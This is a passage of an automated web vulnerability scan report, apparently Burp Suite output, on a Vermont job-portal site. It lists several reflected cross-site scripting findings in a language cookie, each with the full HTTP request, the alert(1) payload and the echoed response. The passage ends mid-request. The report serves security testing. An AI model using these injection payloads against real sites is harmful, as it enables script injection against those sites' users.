PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en60b78"><img src=a onerror=alert(1)>26d42412b51">
...[SNIP]...

3.198. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/etp/etp_newuser_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e46b"%3balert(1)//47870d01fcb was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 7e46b";alert(1)//47870d01fcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en7e46b"%3balert(1)//47870d01fcb; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:34 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:15:33'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN7E46B";ALERT(1)//47870D01FCB\">
...[SNIP]...

3.199. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/etp/etp_newuser_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fd5"><img%20src%3da%20onerror%3dalert(1)>df5821943b1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as e9fd5"><img src=a onerror=alert(1)>df5821943b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=ene9fd5"><img%20src%3da%20onerror%3dalert(1)>df5821943b1; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:23 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:15:22'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ene9fd5"><img src=a onerror=alert(1)>df5821943b1">
...[SNIP]...

3.200. https://www.vermontjoblink.com/ada/leavesite.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/leavesite.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd09"><img%20src%3da%20onerror%3dalert(1)>14180bf8e4f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 1dd09"><img src=a onerror=alert(1)>14180bf8e4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/leavesite.cfm?title=Career+Readiness&url=http%3A%2F%2Fwww%2Eact%2Eorg%2Fcertificate%2F HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en1dd09"><img%20src%3da%20onerror%3dalert(1)>14180bf8e4f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:12 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en1dd09"><img src=a onerror=alert(1)>14180bf8e4f">
...[SNIP]...

3.201. https://www.vermontjoblink.com/ada/leavesite.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/leavesite.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 345b0"%3balert(1)//bb034151741 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 345b0";alert(1)//bb034151741 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/leavesite.cfm?title=Career+Readiness&url=http%3A%2F%2Fwww%2Eact%2Eorg%2Fcertificate%2F HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en345b0"%3balert(1)//bb034151741; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:19 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN345B0";ALERT(1)//BB034151741\">
...[SNIP]...

3.202. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_eligibility_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 192b5"%3balert(1)//4deb3a09ea1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 192b5";alert(1)//4deb3a09ea1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_eligibility_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en192b5"%3balert(1)//4deb3a09ea1; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN192B5";ALERT(1)//4DEB3A09EA1\">
...[SNIP]...

3.203. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_eligibility_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8914"><img%20src%3da%20onerror%3dalert(1)>6aee311800c was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as e8914"><img src=a onerror=alert(1)>6aee311800c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_eligibility_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=ene8914"><img%20src%3da%20onerror%3dalert(1)>6aee311800c; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ene8914"><img src=a onerror=alert(1)>6aee311800c">
...[SNIP]...

3.204. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9d5"><img%20src%3da%20onerror%3dalert(1)>d473d92771b was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as ed9d5"><img src=a onerror=alert(1)>d473d92771b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_forgotpass.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=ened9d5"><img%20src%3da%20onerror%3dalert(1)>d473d92771b; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:24 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ened9d5"><img src=a onerror=alert(1)>d473d92771b">
...[SNIP]...

3.205. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58b0b"><img%20src%3da%20onerror%3dalert(1)>574bc68bc7e8202f9 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 58b0b"><img src=a onerror=alert(1)>574bc68bc7e8202f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
